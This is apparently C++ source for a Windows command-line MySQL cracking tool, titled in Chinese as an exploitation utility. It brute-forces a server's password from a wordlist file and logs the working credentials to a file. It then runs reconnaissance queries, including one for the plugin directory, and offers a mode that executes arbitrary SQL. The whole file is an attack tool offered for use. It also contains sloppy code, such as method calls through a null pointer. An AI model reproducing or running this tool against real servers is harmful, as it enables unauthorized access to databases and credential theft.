Mysql 利用小工具源码

#include "StdAfx.h"
#include "Sql.h"
#include <windows.h>
#include <stdio.h>
#include <mysql.h>

#pragma comment(linker,"/nodefaultlib:LIBCMT.lib")
#pragma comment(linker,"/nodefaultlib:MSVCRTD.lib")
#if defined _DEBUG
#pragma comment(lib, "mysqlclient_debug.lib")
#else
#pragma comment(lib, "mysqlclient.lib")
#endif
#pragma comment(lib, "wsock32.lib")
#pragma comment(lib, "Advapi32.lib")

Sql::Sql(void)
{
}

Sql::~Sql(void)
{
}

void Sql::writefiles(char* buffer)
{
FILE* fp = NULL;
fp = fopen("succ.txt","a+");
if (fp != NULL)
{
fwrite(buffer,strlen(buffer),1,fp);
}
fclose(fp);
}

void Sql::Usage(char* help)
{
printf("[-]:%s Usage:->192.168.1.1->root->crack\r\n",help);
printf("[-]:%s Usage:->192.168.1.1->root->sql->passwordroot->select user()\r\n",help);
//return;
exit(0);
}

int Sql::crack_mysql(char* ServerHost,char* Username,char* password)
{
MYSQL *conn;
MYSQL_RES *res;
MYSQL_ROW row;
char plugs[1024];
conn = mysql_init(NULL);
char buffer[1024] = {0};

int count = 0;
char* Sql_exec[4] = {"select version()","select user()","show databases","select @@plugin_dir"};

if (!mysql_real_connect(conn,ServerHost,
Username,password,"mysql",0,NULL,CLIENT_MULTI_STATEMENTS))
{
printf("Host:%s->Username:%s->Password:%s failed\r\n",ServerHost,Username,password);
mysql_close(conn);
}else
{
memset(buffer,0,sizeof(buffer));
sprintf_s(buffer,"Host:%s->Username:%s->Password:%s successfuly\r\n\r\n",ServerHost,Username,password);
printf(buffer);
writefiles(buffer);

if (mysql_select_db(conn,"mysql"))
{
printf("Select Errors the mysql database!\r\n");
}

for (int i =0;i<4;i++)
{
if (mysql_query(conn,Sql_exec[i]))
{
fprintf(stderr,"%s\r\n",mysql_error(conn));
//exit(1);
}

res = mysql_use_result(conn);
//res = mysql_store_result(conn);

while ((row = mysql_fetch_row(res)) != NULL)
{
sprintf_s(plugs,"%s",row[0]);
printf("%s\r\n",plugs);
}
}
mysql_free_result(res);
mysql_close(conn);
}
return 0;
}

int Sql::sql_exec(char* ServerHost,char* Username,char* password,char* sql)
{
MYSQL *conn;
MYSQL_RES *res;
MYSQL_ROW row;
char plugs[1024];
conn = mysql_init(NULL);

int count = 0;

if (mysql_real_connect(conn,ServerHost,
Username,password,"mysql",0,NULL,CLIENT_MULTI_STATEMENTS))
{
fprintf(stderr,"Host:%s->Username:%s->Password:%s successfuly\r\n\r\n",ServerHost,Username,password);

if (mysql_select_db(conn,"mysql"))
{
printf("Select Errors the mysql database!\r\n");
}

if (mysql_query(conn,sql))
{
fprintf(stderr,"%s\r\n",mysql_error(conn));
//exit(1);
}
if (!(res = mysql_store_result(conn)))
{
return -2;
}

while ((row = mysql_fetch_row(res)) != NULL)
{
ZeroMemory(plugs,sizeof(plugs));
sprintf_s(plugs,"%s",row[0]);
printf("%s\r\n",plugs);
}
mysql_free_result(res);
mysql_close(conn);
}else
{
fprintf(stderr,"Host:%s->Username:%s->Password:%s failed\r\n",ServerHost,Username,password);
}
return 0;
}

int main(int argc,char* argv[])
{
char* ServerHost = argv[1];
char* Username = argv[2];
char* method = argv[3];
Sql* newsql = NULL;
FILE* fp = NULL;
char buffer[MAX_PATH] = {0};
if (argc < 3)
{
newsql->Usage(argv[0]);
}

if (strstr(method,"crack"))
{

fp = fopen("pass.txt","rb");

if (fp == NULL)
{
printf("Error:%d, pwd.txt not found\r\n",GetLastError());
return 0;
}
while (fgets(buffer,MAX_PATH,fp) != NULL)
{
if (buffer[strlen(buffer) - 2] == '\r')
{
buffer[strlen(buffer) - 2] = '\0';
}

if (buffer[strlen(buffer) - 2] == '\n')
{
buffer[strlen(buffer) - 2] = '\0';
}

newsql->crack_mysql(ServerHost,Username,buffer);
memset(buffer,0,sizeof(buffer));
}
fclose(fp);
}else if (strstr(method,"sql"))
{
char* password = argv[4];
char* sql = argv[5];
newsql->sql_exec(ServerHost,Username,password,sql);
}

return 0;
}

#pragma once
class Sql
{
public:
Sql(void);
~Sql(void);
void Usage(char*);
int crack_mysql(char* ServerHost,char* Username,char* password);
int sql_exec(char* ServerHost,char* Username,char* password,char* sql);
void writefiles(char* buffer);
};